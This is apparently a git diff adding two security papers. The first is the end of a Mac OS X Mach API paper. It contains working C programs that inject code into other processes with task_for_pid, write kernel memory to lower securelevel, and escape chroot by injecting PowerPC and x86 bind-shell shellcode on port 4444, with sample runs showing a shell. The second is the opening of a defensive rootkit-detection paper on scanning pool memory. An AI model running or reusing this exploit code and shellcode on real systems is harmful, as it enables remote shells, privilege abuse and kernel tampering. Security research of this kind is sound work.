xnu-792.6.22 + +/* 26 */ mach_reply_port +/* 27 */ thread_self_trap +/* 28 */ task_self_trap +/* 29 */ host_self_trap +/* 31 */ mach_msg_trap +/* 32 */ mach_msg_overwrite_trap +/* 33 */ semaphore_signal_trap +/* 34 */ semaphore_signal_all_trap +/* 35 */ semaphore_signal_thread_trap +/* 36 */ semaphore_wait_trap +/* 37 */ semaphore_wait_signal_trap +/* 38 */ semaphore_timedwait_trap +/* 39 */ semaphore_timedwait_signal_trap +/* 41 */ init_process +/* 43 */ map_fd +/* 45 */ task_for_pid +/* 46 */ pid_for_task +/* 48 */ macx_swapon +/* 49 */ macx_swapoff +/* 51 */ macx_triggers +/* 52 */ macx_backing_store_suspend +/* 53 */ macx_backing_store_recovery +/* 59 */ swtch_pri +/* 60 */ swtch +/* 61 */ thread_switch +/* 62 */ clock_sleep_trap +/* 89 */ mach_timebase_info_trap +/* 90 */ mach_wait_until_trap +/* 91 */ mk_timer_create_trap +/* 92 */ mk_timer_destroy_trap +/* 93 */ mk_timer_arm_trap +/* 94 */ mk_timer_cancel_trap +/* 95 */ mk_timebase_info_trap +/* 100 */ iokit_user_client_trap + +When executing one of these traps the number on the left hand side +(multiplied by -1) must be placed into the eax register. (intel) Each of +the arguments must be pushed to the stack in reverse order. Although I +could go into a low level description of how to send a mach msg here, +the paper in the references has already done this and the author is a +lot better at it than me. I strongly suggest reading this paper if you +are at all interested in the subject matter. + + +6) MIG + +Due to the fact that Mach was designed as a micro-kernel and designed to +function across multiple processors and machines, a large portion of the +functionality is implemented by sending messages between tasks. In +order to facilitate this process, IPC interfaces must be defined to +provide the added functionality. + +To achieve this, Mach (and Apple) use a language called "Mach Interface +Generator" (MIG). MIG is a subset of the Matchmaker language, which +generates C or C++ interfaces for sending messages between tasks. + +When using MIG, files with the extension ".defs" are written containing +a description of the interface. These files are compiled into a .c/.cpp +file and a .h header file. This is done using the /usr/bin/mig tool on +Mac OS X. These generated files contain the appropriate C or C++ stub +code in order to handle the messages defined in the defs file. + +This can be confusing for someone from a UNIX or Windows background who +is new to Mach/Mac OS X. Many of the Mach functions discussed in this paper +are actually implemented as a .defs file. These files are shipped with the +xnu source (which is no longer available). + +An example from one of these files (osfmk/mach/mach_vm.defs) showing the +definition of the vm_allocate() function is provided below. + +/* + * Allocate zero-filled memory in the address space + * of the target task, either at the specified address, + * or wherever space can be found (controlled by flags), + * of the specified size. The address at which the + * allocation actually took place is returned. + */ +#if !defined(_MACH_VM_PUBLISH_AS_LOCAL_) +routine mach_vm_allocate( +#else +routine vm_allocate( +#endif + target : vm_task_entry_t; + inout address : mach_vm_address_t; + size : mach_vm_size_t; + flags : int); + + +It's useful to compile these .defs files with the /usr/bin/mig tool +and then read the generated c code to work out what should be done +when writing shellcode with the mach_msg mach trap. + +For more information on MIG check out [6]. Also, Richard Draves +did a talk on MIG, his slides are available from [7]. + + +7) Replacing ptrace() + +A lot of people seem to move to Mac OS X from a Linux or BSD background +and therefore expect the ptrace() syscall to be useful. However, +unfortunately, this isn't the case on Mac OSX. For some ungodly reason, +Apple decided to leave ptrace() incomplete and unable to do much more +than take a feeble attempt at an anti-debug mechanism or single step the +process. + +As it turns out, the anti-debug mechanism (PT_DENY_ATTACH) only stops +future ptrace() calls from attaching to the process. Since ptrace() +functionality is highly limited on Mac OS X anyway, and task_for_pid() is +unrestricted, this basically has no purpose. + +In this section I will run through the missing features from a /real/ +implementation of ptrace and show you how to implement them on Mac OS X. + +The first and most useful thing we'll look at is how to get a port for +a task. Assuming you have sufficient privileges to do so, you can call +the task_for_pid() function providing a unix process id and you will +receive a port for that task. + +This function is pretty straightforward to use and works as you'd expect. + + pid_t pid; + task_t port; + + task_for_pid(mach_task_self(), pid, &port); + + +After this call, if sufficient privileges were held, a port will be +returned in ``port''. This can then be used with later API function +calls in order to manipulate the target tasks resources. This is pretty +similar conceptually to the ptrace() PTRACE_ATTACH functionality. + +One of the most noticeable changes to ptrace() on Mac OS X is the fact +that it is no longer possible to retrieve register state as you would +expect. Typically, the ptrace() commands PTRACE_GETREGS and +PTRACE_GETFPREGS would be used to get register contents. Fortunately +this can be achieved quite easily using the Mach API. + +The task_threads() function can be used with a port in order to get a +list of the threads in the task. + + thread_act_port_array_t thread_list; + mach_msg_type_number_t thread_count; + + task_threads(port, &thread_list, &thread_count); + +Once you have a list of threads, you can then loop over them and +retrieve register contents from each. This can be done using the +thread_get_state() function. + + +The code below shows the process involved for retrieving the register +contents from a thread (in this case the first thread) of a +thread_act_port_array_t list. + +NOTE: + This code will only work on ppc machines, i396_thread_state_t type is + used for intel. + + + ppc_thread_state_t ppc_state; + mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT; + long thread = 0; // for first thread + + thread_get_state( + thread_list[thread], + PPC_THREAD_STATE, + (thread_state_t)&ppc_state, + &sc + ); + +For PPC machines, you can then print out the registered contents for a +desired register as so: + + printf(" lr: 0x%x\n",ppc_state.lr); + +Now that register contents can be retrieved, we'll look at changing them +and updating the thread to use our new contents. + +This is similar to the ptrace PTRACE_SETREGS and PTRACE_SETFPREGS +requests on Linux. We can use the mach call threadsetstate to do this. +I have written some code to put these concepts together into a tiny +sample program. + +The following small assembly code will continue to loop until the r3 +register is nonzero. + + .globl _main + _main: + + li r3,0 + up: + cmpwi cr7,r3,0 + beq- cr7,up + trap + +The C code below attaches to the process and modifies the value of the +r3 register to 0xdeadbeef. + +/* + * This sample code retrieves the old value of the + * r3 register and sets it to 0xdeadbeef. + * + * - nemo + * + */ + +#include +#include +#include +#include +#include + +void error(char *msg) +{ + printf("[!] error: %s.\n",msg); + exit(1); +} + +int main(int ac, char **av) +{ + ppc_thread_state_t ppc_state; + mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT; + long thread = 0; // for first thread + thread_act_port_array_t thread_list; + mach_msg_type_number_t thread_count; + task_t port; + pid_t pid; + + if(ac != 2) { + printf("usage: %s \n",av[0]); + exit(1); + } + + pid = atoi(av[1]); + + if(task_for_pid(mach_task_self(), pid, &port)) + error("cannot get port"); + + // better shut down the task while we do this. + if(task_suspend(port)) error("suspending the task"); + + if(task_threads(port, &thread_list, &thread_count)) + error("cannot get list of tasks"); + + + if(thread_get_state( + thread_list[thread], + PPC_THREAD_STATE, + (thread_state_t)&ppc_state, + &sc + )) error("getting state from thread"); + + printf("old r3: 0x%x\n",ppc_state.r3); + + ppc_state.r3 = 0xdeadbeef; + + if(thread_set_state( + thread_list[thread], + PPC_THREAD_STATE, + (thread_state_t)&ppc_state, + sc + )) error("setting state"); + + if(task_resume(port)) error("cannot resume the task"); + + return 0; +} + +A sample run of these two programs is as follows: + + -[nemo@gir:~/code]$ ./tst& + [1] 5302 + -[nemo@gir:~/code]$ gcc chgr3.c -o chgr3 + -[nemo@gir:~/code]$ ./chgr3 5302 + old r3: 0x0 + -[nemo@gir:~/code]$ + [1]+ Trace/BPT trap ./tst + +As you can see, when the C code is run, ./tst has it's r3 register +modified and the loop exits, hitting the trap. + +Some other features which have been removed from the ptrace() call on +Mac OS X are the ability to read and write memory. Again, we can +achieve this functionality using Mach API calls. The functions +vm_write() and vm_read() (as expected) can be used to write and read the +address space of a target task. + +These calls work pretty much how you would expect. However there are +examples throughout the rest of this paper which use these functions. +The functions are defined as follows: + +kern_return_t vm_read + (vm_task_t target_task, + vm_address_t address, + vm_size_t size, + size data_out, + target_task data_count); + + +kern_return_t vm_write + (vm_task_t target_task, + vm_address_t address, + pointer_t data, + mach_msg_type_number_t data_count); + + +These functions provide similar functionality to the ptrace requests: +PTRACE_POKETEXT, PTRACE_POKEDATA and PTRACE_POKEUSR. + +The memory being read/written must have the appropriate protection in +order for these functions to work correctly. However, it is quite easy +to set the protection attributes for the memory before the read or write +takes place. To do this, the vm_protect() API call can be used. + +kern_return_t vm_protect + (vm_task_t target_task, + vm_address_t address, + vm_size_t size, + boolean_t set_maximum, + vm_prot_t new_protection); + +The ptrace() syscall on Linux also provides a way to step a process up +to the point where a syscall is executed. The PTRACE_SYSCALL request is +used for this. This functionality is useful for applications such as +"strace" to be able to keep track of system calls made by an +application. Unfortunately, this feature does not exist on Mac OS X. The +Mach api provides a very useful function which would provide this +functionality. + +kern_return_t task_set_emulation + (task_t task, + vm_address_t routine_entry_pt, + int syscall_number); + +This function would allow you to set up a userspace handler for a +syscall and log it's execution. However, this function has not been +implemented on Mac OS X. + + +8) Code injection + +The concept of using the Mach API in order to inject code into another +task has been demonstrated numerous times. The most well known +implementation is named machinject. This code uses task_for_pid() to +get a port for the chosen pid. The threadcreaterunning() function is +used to create a thread in the task and set the register state. In this +way control of execution is gained. This code has been rewritten using +the same method for the intel platform. + +It's also pretty easy to set the thread starting state to point to the +dlopen() function and load a dylib from disk. Or even vm_map() an object +file into the process space by hand and fix up relocations yourself. + + +9) Moving into the kernel + +Since Mac OS X 10.4.6 on intel systems (the latest release of Mac OSX at +the time of writing this paper) both /dev/kmem and /dev/mem have been +removed. Because of this fact, a new method for entering and +manipulating the kernel memory is needed. + +Luckily, Mach provides a solution. By using the task_for_pid() mach trap +and passing in pid=0 the kernel machportt port is available. Obviously, +root privileges are required in order to do so. + +Once this port is acquired, you are able to read and write directly to +the kernel memory using the vm_read() and vm_write() functions. You can +also vm_map() or vm_remap() files and mappings directly into kernel +memory. + +I am using this functionality for a new version of the WeaponX rootkit, +but there are plenty other reasons why this is useful. + + +10) Security considerations of a UNIX / Mach hybrid + +Many problems arise when both UNIX and Mach aspects are provided on the +same system. As the quote from the Apple Security page says (mentioned +in the introduction). A good Mach programmer will be able to bypass high +level BSD security functionality by using the Mach API/Mach Traps on Mac +OS X. + +In this section I will run through a couple of examples of situations +where BSD security can be bypassed. There are many more cases like this. +I'll leave it up to you (the reader) to find more. + +The first bypass which we will look at is the "kern.securelevel" sysctl. +This sysctl is used to restrict various functionality from the root +user. When this sysctl is set to -1, the restrictions are non-existent. +Under normal circumstances the root user should be able to raise the +securelevel however lowering the securelevel should be restricted. + +Here is a demonstration of this: + + -[root@fry:~]$ id + uid=0(root) gid=0(wheel) + + -[root@fry:~]$ sysctl -a | grep securelevel + kern.securelevel = 1 + + -[root@fry:~]$ sysctl -w kern.securelevel=-1 + kern.securelevel: Operation not permitted + + -[root@fry:~]$ sysctl -w kern.securelevel=2 + kern.securelevel: 1 -> 2 + + -[root@fry:~]$ sysctl -w kern.securelevel=1 + kern.securelevel: Operation not permitted + +As you can see, modification of this sysctl works as described above. +However! Due to the fact that we can task_for_pid() pid=0 and write to +kernel memory, we can bypass this. + +In order to do this, we simply get the address of the variable in +kernel- space which stores the securelevel. To do this we can use the +`nm' tool. + + -[root@fry:~]$ nm /mach_kernel | grep securelevel + 004bcf00 S _securelevel + +We can then use this value by calling task_for_pid() to get the kernel +task port, and calling vm_write() to write to this address. The code +below does this. + +Here is an example of this code being used. + + -[root@fry:~]$ sysctl -a | grep securelevel + kern.securelevel = 1 + + -[root@fry:~]$ ./slevel -1 + [+] done! + + -[root@fry:~]$ sysctl -a | grep securelevel + kern.securelevel = -1 + +A kext could also be used for this. But this is neater and relevant. + +/* + * [ slevel.c ] + * nemo@felinemenace.org + * 2006 + * + * Tools to set the securelevel on + * Mac OSX Build 8I1119 (10.4.6 intel). + */ + + +#include +#include +#include +#include + +// -[nemo@fry:~]$ nm /mach_kernel | grep securelevel +// 004bcf00 S _securelevel +#define SECURELEVELADDR 0x004bcf00 + +void error(char *msg) +{ + printf("[!] error: %s\n",msg); + exit(1); +} + +void usage(char *progname) +{ + printf("[+] usage: %s \n",progname); + exit(1); +} + +int main(int ac, char **av) +{ + mach_port_t kernel_task; + kern_return_t err; + long value = 0; + + if(ac != 2) + usage(*av); + + if(getuid() && geteuid()) + error("requires root."); + + value = atoi(av[1]); + + err = task_for_pid(mach_task_self(),0,&kernel_task); + if ((err != KERN_SUCCESS) || !MACH_PORT_VALID(kernel_task)) + error("getting kernel task."); + + // Write values to stack. + if(vm_write(kernel_task, (vm_address_t) SECURELEVELADDR, (vm_address_t)&value, sizeof(value))) + error("writing argument to dlopen."); + + printf("[+] done!\n"); + return 0; +} + +The chroot() call is a UNIX mechanism which is often (mis)used for +security purposes. This can also be bypassed using the Mach +API/functionality. A process running on Mac OSX within a chroot() is +able to attach to any process outside using the task_for_pid() Mach +trap. Although neither of these problems are significant, they are an +indication of some of the ways that UNIX functionality can be bypassed +using the Mach API. + +The code below simply loops through all pids from 1 upwards and attempts +to inject a small code stub into a new thread. It is written for PowerPC +architecture. I have also included some shellcode for intel arch in case +anyone has the need to use it in these circumstances. + +/* + * sample code to break chroot() on osx + * - nemo + * + * This code is a PoC and by so, is pretty harsh + * I just trap in any process which isn't desirable. + * DO NOT RUN ON A PRODUCTION BOX (or if you do, email + * me the results so I can laugh at you) + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define STACK_SIZE 0x6000 +#define MAXPID 0x6000 + +char ppc_probe[] = +// stat code +"\x38\x00\x00\xbc\x7c\x24\x0b\x78\x38\x84\xff\x9c\x7c\xc6\x32" +"\x79\x40\x82\xff\xf1\x7c\x68\x02\xa6\x38\x63\x00\x18\x90\xc3" +"\x00\x0c\x44\x00\x00\x02\x7f\xe0\x00\x08\x48\x00\x00\x14" +"/mach_kernelAAAA" +// bindshell from metasploit. Port 4444 +"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00" +"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00" +"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38" +"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02" +"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00" +"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80" +"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44" +"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02" +"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00" +"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82" +"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c" +"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28" +"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00" +"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0" +"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00"; + +unsigned char x86_probe[] = +// stat code, cheq for /mach_kernel. Makes sure we're outside +// the chroot. +"\x31\xc0\x50\x68\x72\x6e\x65\x6c\x68\x68\x5f\x6b\x65\x68\x2f" +"\x6d\x61\x63\x89\xe3\x53\x53\xb0\xbc\x68\x7f\x00\x00\x00\xcd" +"\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80\x90\x90\x90\x90\x90" +// bindshell - 89 bytes - port 4444 +// based off metasploit freebsd code. +"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c" +"\x89\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53" +"\x52\x6a\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e" +"\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" +"\x0f\x89\xf1\xff\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" +"\x69\x6e\x89\xe3\x50\x54\x54\x53\x53\xb0\x3b\xcd\x80"; + +int injectppc(pid_t pid,char *sc,unsigned int size) +{ + kern_return_t ret; + mach_port_t mytask; + vm_address_t stack; + ppc_thread_state_t ppc_state; + thread_act_t thread; + long blr = 0x7fe00008; + + if ((ret = task_for_pid(mach_task_self(), pid, &mytask))) + return -1; + + // Allocate room for stack and shellcode. + if(vm_allocate(mytask, &stack, STACK_SIZE, TRUE) != KERN_SUCCESS) + return -1; + + // Write in our shellcode + if(vm_write(mytask, (vm_address_t)((stack + 650)&~2), (vm_address_t)sc, size)) + return -1; + + if(vm_write(mytask, (vm_address_t) stack + 960, (vm_address_t)&blr, sizeof(blr))) + return -1; + + // Just in case. + if(vm_protect(mytask,(vm_address_t) stack, STACK_SIZE, +VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE,VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE)) + return -1; + + + memset(&ppc_state,0,sizeof(ppc_state)); + ppc_state.srr0 = ((stack + 650)&~2); + ppc_state.r1 = stack + STACK_SIZE - 100; + ppc_state.lr = stack + 960; // terrible blr cpu usage but this + // whole code is a hack so shutup!. + + if(thread_create_running(mytask, PPC_THREAD_STATE, + (thread_state_t)&ppc_state, PPC_THREAD_STATE_COUNT, &thread) + != KERN_SUCCESS) + return -1; + + return 0; +} + +int main(int ac, char **av) +{ + pid_t pid; + // (pid = 0) == kernel + printf("[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).\n"); + for(pid = 1; pid <= MAXPID ; pid++) + injectppc(pid,ppc_probe,sizeof(ppc_probe)); + + return 0; +} + +The output below shows a sample run of this code on a stock standard Mac +OSX 10.4.6 Mac mini. As you can see, a non privilege user within the +chroot() is able to attach to a process running at the same privilege +level outside of the chroot(). Some shellcode can then be injected into +the process to bind a shell. + + -[nemo@gir:~/code]$ gcc break.c -o break + -[nemo@gir:~/code]$ cp break chroot/ + -[nemo@gir:~/code]$ sudo chroot chroot/ + -[root@gir:/]$ ./dropprivs + +An interesting note about this little ./dropprivs program is that I had +to use seteuid()/setuid() separately rather than using the setreuid() +function. It appears setreuid() and setregid() don't actually work at +all. Andrewg summed this situation up nicely: + + best backdoor ever + + -[nemo@gir:/]$ ./break + [+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP). + -[nemo@gir:/]$ Illegal instruction + -[root@gir:/]$ nc localhost 4444 + ls -lsa /mach_kernel + 8472 -rw-r--r-- 1 root wheel 4334508 Mar 27 14:27 /mach_kernel + id; + uid=501(nemo) gid=501(nemo) groups=501(nemo) + +Another method of breaking out from a chroot() environment would be to +simply task_for_pid() pid 0 and write into kernel memory. However since +this would require root privileges I didn't bother to implement it. +This code could quite easily be implemented as shellcode. However, due +to time constraints and lack of caring, I'll leave it up to you to do +so. + +== ptrace + +As I mentioned in the ptrace section of this paper, the ptrace() syscall +has been heavily bastardized and is pretty useless now. However, a new +ptrace command PT_DENY_ATTACH has been implemented to enable a process +to request that other processes will not be able to ptrace attach to it. + +The following sample code shows the use of this: + + #include + #include + #include + + static int changeme = 0; + + int main(int ac, char **av) + { + + ptrace(PT_DENY_ATTACH, 0, 0, 0); + + while(1) { + if(changeme) { + printf("[+] hacked.\n"); + exit(1); + } + } + + return 1; + } + +This code does nothing but sit and spin while checking the status of a +global variable which is never changed. As you can see below, if we try +to attach to this process in gdb (which uses ptrace) our process will +receive a SIGSEGV. + + (gdb) at hackme.25143 + A program is being debugged already. Kill it? (y or n) y + Attaching to program: `/Users/nemo/hackme', process 25143. + Segmentation fault + +However we can use the Mach API, as mentioned earlier, and still attach +to the process just fine. We can use the `nm' command in order to get +the address of the static changeme variable. + + -[nemo@fry:~]$ nm hackme | grep changeme + 0000202c b _changeme + +Then, using the following code, we task_for_pid() the process and +modify the contents of this variable (as an example.) + + #include + #include + #include + #include + #include + #include + #include + + #define CHANGEMEADDR 0x202c + + void error(char *msg) + { + printf("[!] error: %s\n",msg); + exit(1); + } + + int main(int ac, char **av) + { + mach_port_t port; + long content = 1; + + if(ac != 2) { + printf("[+] usage: %s \n",av[0]); + exit(1); + } + + if(task_for_pid(mach_task_self(), atoi(av[1]), &port)) + error("_|_"); + + if(vm_write(port, (vm_address_t) CHANGEMEADDR, (vm_address_t)&content, sizeof(content))) + error("writing to process"); + + return 0; + } + +As you can see below, this will result in the loop terminating as expected. + + -[nemo@fry:~]$ ./hackme + [+] hacked. + -[nemo@fry:~]$ + + +11) Conclusion + +Well you actually read all the way to the bottom of this paper! Hope it +wasn't too boring. Things are changing a little on Mac OS X. The later +releases (10.4.6) on Intel have new restrictions in place on the +task_for_pid() function. These restrictions require you to be part of +the "procmod" group or root in order to call the task_for_pid() mach +trap. Luckily these restrictions are easily bypassable. + +There is also mixed discussion (gossip) about whether or not Mach will +be completely removed from Mac OS X in future. I have no idea how true +(or not) this is though. + +If you noticed any problems with the content, as I mentioned earlier, +please email me at nemo@felinemenace.org and let me know. No pointless +(unconstructive) criticism please though. + +Thanks to everyone at felinemenace and pulltheplug for your ongoing +support and friendship. Also thanks to anyone who proof read this paper +for me and to the uninformed team for giving me the opportunity to +publish this. + +Bibliography + + +[1] CMU. The Mach Project. + http://www.cs.cmu.edu/afs/cs/project/mach/public/www/mach.html + +[2] Apple. Apple Security Overview. + http://developer.apple.com/documentation/Security/Conceptual/Security_Overview/Concepts/chapter_3_section_9.html + +[3] Mach. Mach Man-pages. + http://felinemenace.org/ nemo/mach/manpages + +[4] Rentzsch. Mach Inject. + http://rentzsch.com/mach_inject/ + +[5] Guiheneuf. Mach Inject. + http://guiheneuf.org/Site/mach + +[6] Richard P. Draves/Michael B. Jones and Mary R. Thompson. Mach Interface Generator. + http://felinemenace.org/ nemo/mach/mig.txt + +[7] Richard P. Draves. MIG Slides. + http://felinemenace.org/ nemo/mach/Slides + +[8] Wikipedia. Mach Kernel. + http://en.wikipedia.org/wiki/Mach_kernel + +[9] Feline Menace. The Mach System. + http://felinemenace.org/ nemo/mach/Mach.txt + +[10] OSX Code. Mach. + http://www.osxcode.com/index.php?pagename=Articles&article=10 + +[11] CMU. A Programmer's Guide to the Mach System Calls. + http://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/abstracts/machsys.html + +[12] CMU. A Programmer's Guide to the Mach User Environment. + http://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/abstracts/machuse.html diff --git a/uninformed/4.7.txt b/uninformed/4.7.txt new file mode 100644 index 0000000..5d553b9 --- /dev/null +++ b/uninformed/4.7.txt @@ -0,0 +1,821 @@ +GREPEXEC: Grepping Executive Objects from Pool Memory +bugcheck +chris@bugcheck.org + +1) Foreword + +Abstract: + +As rootkits continue to evolve and become more advanced, methods that can be +used to detect hidden objects must also evolve. For example, relying on system +provided APIs to enumerate maintained lists is no longer enough to provide +effective cross-view detection. To that point, scanning virtual memory for +object signatures has been shown to provide useful, but limited, results. The +following paper outlines the theory and practice behind scanning memory for +hidden objects. This method relies upon the ability to safely reference the +Windows system virtual address space and also depends upon the building and +locating effective memory signatures. Using this method as a base, suggestions +are made as to what actions might be performed once objects are detected. The +paper also provides a simple example of how object-independent signatures can be +built and used to detect several different kernel objects on all versions of +Windows NT+. Due to time constraints, the source code associated with this +paper will be made publicly available in the near future. + +Thanks: + +Thanks to skape, Peter, and the rest of the uninformed hooligans; +you guys and gals rock! + +Disclaimer: + +The author is not responsible for how the papers contents are used +or interpreted. Some information may be inaccurate or incorrect. If +the reader feels any information is incorrect or has not been +properly credited please contact the author so corrections can be +made. All content refers to the Windows XP Service Pack 2 +platform unless otherwise noted. + + +2) Introduction + +As rootkits become increasingly popular and more sophisticated than +ever before, detection methods must also evolve. While rootkit +technologies have evolved beyond API hooking methods, detectors have +also evolved beyond the hook detection ages. At first +rootkits such as FU were detected using various methods +which exploited its weak and proof-of-concept design by applications +such as Blacklight. These specific weaknesses were +addressed in FUTo. However, some still remain excluding +the topic of this paper. + +RAIDE, a rootkit detection tool, uses a memory +signature scanning method in order to find EPROCESS blocks hidden by +FUTo. This specific implementation works, however, it too has its +weaknesses. This paper attempts to outline the general concepts of +implementing a successful rootkit detection method using memory +signatures. + +The following chapters will discuss how to safely enumerate system +memory, what to look for when building a memory signature, what to +do once a memory signature has been found, and potential methods of +breaking memory signatures. Finally, an accompanying tool will be used +to concretely illustrate the subject of this paper. + +After reading the following paper, the reader should have an +understanding of the concepts and issues related to kernel object +detection using memory signatures. The author believes this to be an +acceptable method of rootkit detection. However, as with most things +in the security realm, no one technique is the ultimate solution and +this technique should only be considered complimentary to other known +detection methods. + + +3) Scanning Memory + +Enumerating arbitrary system memory is nowhere near a science since +its state can change at anytime while you are attempting to access +it. While this is true, the memory that surrounds kernel executive +objects should be fairly consistent. With proper care, memory accesses +should be safe and the chance of false positives and negatives should be +fairly minimal. The following sections will outline a safe method to +enumerate the contents of both the system's PagedPool and +NonPagedPool. + +3.1) Retrieving Pool Ranges + +For the purpose of enumerating pool memory it is unnecessary to +enumerate the entire system address space. The system maintains a +few global variables such as nt!MmPagedPoolStart, +nt!MmPagedPoolEnd and related NonPagedPool +variables that can be used in order to speed up a search and reduce +the possibility of unnecessary false positives. Although these +global variables are not exported, there are a couple ways in that +they can be obtained. + +The most reliable method on modern systems (Windows XP Service Pack 2 +and up) is through the use of the KPCR->KdVersionBlock pointer located +at fs:[0x34]. This points to a KDDEBUGGER_DATA64 structure which is +defined in the Debugging Tools For Windows SDK header file wdbgexts.h. +This structure is commonly used by malicious software in order to gain +access to non-exported global variables to manipulate the system. + +A second method to obtain PagedPool values is to reference the +per-session nt!_MM_SESSION_SPACE found at EPROCESS->Session. This contains +information about the session owning the process, including its ranges +and many other PagedPool related values shown here. + +kd> dt nt!_MM_SESSION_SPACE + +0x01c NonPagedPoolBytes : Uint4B + +0x020 PagedPoolBytes : Uint4B + +0x024 NonPagedPoolAllocations : Uint4B + +0x028 PagedPoolAllocations : Uint4B + +0x044 PagedPoolMutex : _FAST_MUTEX + +0x064 PagedPoolStart : Ptr32 Void + +0x068 PagedPoolEnd : Ptr32 Void + +0x06c PagedPoolBasePde : Ptr32 _MMPTE + +0x070 PagedPoolInfo : _MM_PAGED_POOL_INFO + +0x244 PagedPool : _POOL_DESCRIPTOR + +While enumerating the entire system address space is not preferable, it +can still be used in situations where pool information cannot be +obtained. The start of the system address space can be assumed to be +any address above nt!MmHighestUserAddress. However, it would appear +that an even safer assumption would be the address following the +LARGE_PAGE where ntoskrnl.exe and hal.dll are mapped. This can be +obtained by using any address exported by hal.dll and rounding up to the +nearest large page. + + +3.2) Locking Memory + +When accessing arbitrary memory locations, it is important that pages be +locked in memory prior to accessing them. This is done to ensure that +accessing the page can be done safely and will not cause an exception +due to a race condition, such as if it were to be de-allocated between a +check and a reference. The system provides a routine to lock pages +named nt!MmProbeAndLockPages. This routine can be used to lock either +pagable or non-paged memory. Since physical pages maintain a reference +count in the nt!MmPfnDatabase there is no worry of an outside source +unlocking the pages and having them page out to disk or become invalid. + +In order to use MmProbeAndLockPages, a caller must first build an MDL +structure using something such as nt!IoAllocateMdl or +nt!MmInitializeMdl. The MDL creation routines are passed a virtual +address and length describing the block of virtual memory to be +referenced. On a successful call to nt!MmProbeAndLockPages, the virtual +address range described by the MDL structure is safe to access. Once the +block is no longer needed to be accessed, the pages must be unlocked +using nt!MmUnlockPages. + +A trick can be used to further reduce the number of pages locked when +enumerating the NonPagedPool. As documented, MmProbeAndLockPages can be +called at DISPATCH_LEVEL with the limitation of it only being allowed to +lock resident memory pages and failing otherwise, which is a desirable +side-effect in this case. + + +4) Detecting Executive Objects + +In general, all of the executive components of the NT kernel rely on the +object manager in order to manage the objects they allocate. All objects +allocated by the object manager have a common header named OBJECT_HEADER +and additional optional headers such as OBJECT_HEADER_NAME_INFO, process +quota information, and handle trace information. Let's take a look to +see what is common to all executive objects and how we can use the pool +block header information to identify an allocated executive object. +Lastly, some object specific information will be discussed in terms of +generating a useful memory signature for an object. + +4.1) Generic Object Information + +Since the OBJECT_HEADER is common to all objects, let's look at it in +detail. A static field here refers to all objects of specific type, not +all executive objects in the system. + +kd> dt _OBJECT_HEADER + +0x000 PointerCount : Int4B + +0x004 HandleCount : Int4B + +0x004 NextToFree : Ptr32 Void + +0x008 Type : Ptr32 _OBJECT_TYPE + +0x00c NameInfoOffset : UChar + +0x00d HandleInfoOffset : UChar + +0x00e QuotaInfoOffset : UChar + +0x00f Flags : UChar + +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION + +0x010 QuotaBlockCharged : Ptr32 Void + +0x014 SecurityDescriptor : Ptr32 Void + +0x018 Body : _QUAD + + -------------------+------------+------------------------------------- + PointerCount | Variable | of references + HandleCount | Variable | of open handles + NextToFree | NotValid | Used when freed + Type | Static | Pointer to OBJECTTYPE + NameInfoOffset | Static | 0 or offset to related header + HandleInfoOffset | Static | 0 or offset to related header + QuotaInfoOffset | Static | 0 or offset to related header + Flags | NotCertain | Not certain + ObjectCreateInfo | Variable | Pointer to OBJECTCREATEINFORMATION + QuotaBlockCharged | NotCertain | Not certain + SecurityDescriptor | Variable | Pointer to SECURITYDESCRIPTOR + Body | NotValid | Union with the actual object + -------------------+------------+------------------------------------- + +From this it is assumed that the most reliable and unique signature is +the Type field of the OBJECT_HEADER which could be used in order to +identify objects of a specific type such as EPROCESS, ETHREAD, +DRIVER_OBJECT, and DEVICE_OBJECT objects. + + +4.2) Validating Pool Block Information + +Kernel pool management appears to be slightly different from usermode +heap management. However, if one assumes that the only concern is +dealing with pool memory allocations which are less then PAGE_SIZE, it is +fairly similar. Each call to ExAllocatePoolWithTag() returns a +pre-buffer header as follows: + +kd> dt _POOL_HEADER + +0x000 PreviousSize : Pos 0, 9 Bits + +0x000 PoolIndex : Pos 9, 7 Bits + +0x002 BlockSize : Pos 0, 9 Bits + +0x002 PoolType : Pos 9, 7 